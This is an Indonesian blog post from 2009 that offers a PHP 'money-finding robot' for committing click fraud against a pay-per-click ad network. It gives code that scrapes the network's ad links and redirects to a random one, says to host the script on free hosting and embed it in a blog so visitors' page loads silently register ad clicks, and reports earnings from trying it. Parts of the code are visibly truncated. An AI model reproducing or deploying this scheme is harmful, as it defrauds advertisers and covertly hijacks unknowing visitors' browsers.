Sabtu, 19 September 2009

Script Robot Pencari Duit

Wahhh. sori banget nih ... gw udah lebih dari 3 bulan lebih ga pernah lihat nih blog...
maklum gw ngerjain proyek yang gebih gede... alah ga penting yah....
posting sebelumnya memang saya pernah menjanjikan akan memberikan bagaimana caranya membuat script robot si pencari duit...
dan sekarang gw dah dapet ijin dari sang pemilik situs penyedia iklan (kumpu blogger dot kom)
untuk posting sebelumnya gw belum bisa memberikan scriptnya, gw masih menghargai sang pemilik situs, jadi gw sekalian meminta ijin publikasi script robot dan sekarang sudah dapet tuh ijinnnya..
gw udah memberikan scriptnya dan menyarankan ke situs tersebut untuk memperbaiki scriptnya dan mungkin sudah diperbaiki jadi gw dapet ijin publikasi ini script.sebenarnya gw rada curiga nih.... jangan bilang siapa2 (jadi rahasia terbuka). jangan2 situs tersebut membolehkan script ini beredar agar perputaran uangnya jadi cepet. masalahnya gw lihat dari berita yang ia tayangkan bahwa situs tersebut kebanjiran order pulsa, yang baru order pulsa harus menunggu bebrapa hari, jadi kalo script ini beredar maka akan mempercepat perputaran uang atau memepercepat pendapatan bersihnya dan juga.. ah tapi itumah hanya perkiraan belaka (fiktor alias fikiran kotor.... bukan jorok :))
ok gw jelasin di sini jah deh... scriptnya
pertama lo pade buka notepad lalu copy script berikut :

gw kasih warna merah, lo mesti ngerti tuh maksudnya
biasanya script yang diberikan oleh situs tersebut adalah lengkap dengan no id. nah pertama lo copy alamat website yang diberikan lalu paste di bagian yang berwarna merah
seperti gambar berikut inih...

Penjelasannya lenkapnya sebagai berikut :


$c='http://kumpubogger.com/sca.php?b=............';

Perintah tersebut adalah untuk mengambil nilai variable

Untuk variable $c harus diisi dengan alamat halaman yang dituju, disini yang dimaksud adalah kumpubogger.com/sca.php lengkap dengan no ID yang diawali dengan "b=" seperti gambar di atas


http://kumpubogger.com/sca.php?b= jika variable di url tersebut bukan b maka harus di sesuaikan.

$handle=fopen($c, "rb");
$tujuan='lempar';$kode=$b;

$contents=stream_get_contents($handle);
fclose($handle);

perintah di atas untuk membuka halaman target yang akan diklik, yang dimaksud adalah membuka file script sca.php lalu tujuannya adalah lempar.php yaitu untuk melempar link iklan yang dituju untuk proses pencatatan klik ke dalam database kumpubogger.com

$data=array(0);

$st=explode("

$j=0;

for ($i=1;$i

$a=explode(">",$st[$i]);

$dat=explode("'",$a[0]);

if(ereg('/',$dat[1])&&eregi($tujuan,$dat[1])&&eregi($kode,$dat[1])){

$data[$j]=$dat[1];

$j++;}

}

Perintah di atas adalah untuk menyaring dan mengambil link alamat yang dituju. Link yang dituju adalah link iklan yang akan dilempar ke lempar.php sehingga link http://kumpubogger.com/lempar.php?.......... dapat ditangkap dan disimpan dalam variable, dengan demikian sangat mudah untuk diklik iklan tersebut

if(strlen($b)>0)

header("location: ".$data[rand(0,count($data)-1)]);

perintah di atas adalah untuk mengklik halaman yang dituju dengan menggunakan metode acak supaya tidak terlihat bahwa klik tidak hanya di satu titik posisi urutan link. if(strlen($b)>0) berfungsi untuk menyeleksi jika link sudah ditangkap oleh variable. dan jika sudah tertangkap maka dengan menggunakan fungsi header(), link tersebut dibuka atau sama saja dengan mengklik iklan….

Selain itu juga sangat perlu memanfaatkan hosting PHP gratis yang bertebaran di dunia maya. ambil contoh misalnya dari 000webhost.c0m. hal ini dengan tujuan sebagai inang robot.

Simpan script di atas dengan nama bebas misalnya robot.php di dalam host gratis yang digunakan dan gw ambil contoh domain dari host gratisnya menggunakan getduit.comuf.com . kemudian di dalam blog masukkan script yang mengaktifkan script di atas. Blog harus Sesuai dengan pendaftaran blog ke kumpubogger.com agar referrer nya tercatat benar-benar berasal dari blog yang terdaftar

Nah untuk mengaktifkannya silahkan masukin kode ke dalam blog yang telah terpasang iklan dari kumpubogger dengan menggunakan scriptdi bawah ini. ingat sesuaikan domain dari host gratis dan nama file robotnya


Jadi prinsip kerjanya adalah ketika orang lain membuka blog dan secara otomatis iklan dari kumpubogger diklik saat bolg dibuka dan tidak akan terlihat reaksi apa-apa.

tapi hasilnya dapat lo lihat sendiri....

sebagai bukti nih gw print screen hsil percobaan gw


gw simpan script tersebut di site yang memiliki traffik tinggi pas gw lihat hasil pendapatan di kumpuboggger.com menit pertama dapet Rp, 1000, menit kedua Rp. 2000 dan pada menit ke sepeluh dapet Rp. 3500 dan akhirnya gw perkecil pendapatannya dengan membagi seperseratus kali klik dari traffic yang ada trus gw hentikan pada jam ke 16 lebih seperti pada print screen di atas.

lo bisa pake tuh script tapi lo mesti hati2

gw juga sebenarnya udah buat juga script robot untuk site biindit?dot?kom tapi gw minta ijin untuk publikasi. ntar deh kalo udah gw dapet ijin gw pasti postkan di sini....

Semoga informasi ini bermanfaat. ….

Tidak ada komentar:

Posting Komentar